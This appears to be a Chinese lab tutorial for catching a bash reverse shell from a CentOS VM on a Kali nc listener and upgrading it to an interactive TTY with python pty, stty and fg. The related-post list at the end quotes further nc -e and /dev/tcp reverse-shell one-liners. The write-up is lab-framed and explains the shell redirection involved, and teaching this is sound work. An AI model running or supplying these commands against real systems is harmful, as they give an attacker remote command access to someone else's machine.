mysql 反弹shell_反弹shell升级成交互式shell
实验环境:
A : kali 虚拟机
B: centos7.5 虚拟机
1. A 机 kali 虚拟机 设置监听 端口
root@kali64:~# nc -lvvp 9001
# 端口随便定义,没被使用就行
2. B机 执行命令反弹shell
[root@localhost ~]# bash -i >& /dev/tcp/192.168.2.128/9001 0>&1
# ip地址为 kali 虚拟机的ip地址,端口为kali虚拟机监听的端口 主机ip和端口之间为`/`
补充:
标准输入 (stdin) :代码为 0
标准输出 (stdout):代码为 1
标准错误 (stderr):代码为 2
> 为重定向符号 , & 没有固定的意思
&> ,>&理解成一个整体
&>file # 将 标准输出 和 标准错误输出 都重定向到文件file中
>& # 将标准输出和标准错误输出重定向到文件/dev/tcp/,即传递到远程
2>&1 # 将标准错误重定向到标准输出中
0>&1 # 将标准输入重定向到标准输出中
反弹后再kali机上面查看,可以输入命令,不支持tab键,清屏等功能,需要升级成交互式shell
3.升级交互式shell
# 以下命令都是在kali 机上面操作
[root@localhost ~]# python -c 'import pty; pty.spawn("/bin/bash")' #使用python
[root@localhost ~]# ^Z # ctrl + z 按键 挂起正在运行的程序
root@kali64:~# stty raw -echo # 输入这句后 在输入命令终端不在显示
root@kali64:~# fg # 把后台挂起的程序,放到控制台----》 终端不显示命令,输入后回车
[root@localhost ~]# reset
[root@localhost ~]# export SHELL=bash
退回到kali机
# 以下命令都在kali机上面操作
[root@localhost ~]# exit # 退出终端
[root@localhost ~]# exit # 看前面主机名和用户来区分,继续退出,
root@kali64:~#
# 看到主机名变为kali说明回到kali机上面了------ 此时输入命令是不显示的
root@kali64:~# reset # 将终端恢复至原始状态
补充:
stty -echo # 禁止回显,当在键盘上输入时,并不出现在屏幕上
stty echo # 打开回显
stty raw # 设置原始输入
stty -raw # 关闭原始输入
bg # 将一个在后台暂停的命令,变成继续执行
fg # 将后台中的命令调至前台继续运行
jobs # 查看当前有多少在后台运行的命令
ctrl + z # 可以将一个正在前台执行的命令放到后台,并且暂停
clear # 清屏,本质上只是让终端显示页向后翻了一页,如果向上滚动屏幕还可以看到之前的操作信息。
reset # 将终端恢复至原始状态,之前的终端输入操作信息将都会被清空
mysql 反弹shell_反弹shell升级成交互式shell相关推荐
- 交互式shell和非交互式shell、登录shell和非登录shell
交互式shell和非交互式shell.登录shell和非登录shell: 我们在图形交互界面操作时,是交互式的,先理解交互式下的登陆和非登录概念: 概念 举例 特点 登陆shell 用户登陆时,输入用 ...
- 反弹Shell升级为交互式Shel
前言 经常我们拿到的shell是一个简单的shell 如何把一个简单的shell就升级到一个标准交互式shell 写这篇文章记录一下 正文 攻击机:kali 靶机:ubuntu 普通Shell 给ka ...
- python反弹shell_反弹shell的各种姿势
在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入. 反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步.所有姿势 ...
- python反弹shell_反弹Shell小结
1.NC反弹shell 1.1.正向反弹shell 服务器 nc -lvvp 7777 -e /bin/bash 攻击机 nc server-ip 7777 1.2.反向反弹shell 攻击机 nc ...
- python反弹shell_反弹shell的几种方式总结
假设本机地址10.10.10.11,监听端口443. 1.Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: bash -i ...
- python3 -c ‘import pty;pty.spawn(“/bin/bash“)‘升级切换交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm Ctrl+Z stty -a stty raw - ...
- linux 非登录shell自动,Linux登录shell和非登录(交互式shell)环境变量配置
使用Jenkins执行shell脚本的时候, 碰到command not found. 比如java mvn, 这些环境变量配置在/etc/profile 中, 但jenkins执行的时候并没有加载. ...
- php 与shell,[转]PHP与Shell交互
From : http://blog.csdn.net/houqd2012/article/details/8219199 最近想使用PHP与Sheel进行交互.PHP控制显示和高层的逻辑结构.She ...
- shell从入门到精通(25)你知道什么是login shell和non login shell吗
bash有几种不同的运行模式,login shell与non-login shell,interactive shell与non-interactive shell(比如执行shell脚本).这两种分 ...
最新文章
- python编码读法-python读音
- 面试的时候的要注意的case应该怎么分析
- 2017年10月05日普及组 负进制
- [.NET] : 设定Windows Service启动类型
- 关于概率性事件的产品性能和客户体验讨论
- 数据结构11——KMP
- 各代iphone尺寸_iphone屏幕尺寸比例是多少,iphone各代屏幕尺寸大小介绍
- led灯条串联图_10个LED灯并联再串联
- 常用坐标系介绍及转换方式
- 如何获取支付宝应用APPID
- 手机屏幕 高宽有哪些_苹果手机屏幕有哪些尺寸?
- java string newline,Java BufferedWriter newLine()用法及代码示例
- wps透视表列总计移到顶部_数据透视表总计中的错误
- 计算几何及其应用——计算几何基础
- matlab从mp4文件中提取音频,怎么提取MP4视频中的音频,将MP4格式转换为MP3格式
- 哪些在职人员可以考一级消防工程师
- Android Transtion
- 如何用pdf转jpg软件将pdf转换成图片
- android自定义手势,Android编程实现自定义手势的方法详解
- 因0x764fb11c的错误状态_Windows10有时无法快速启动,错误状态为 0xC00000D4。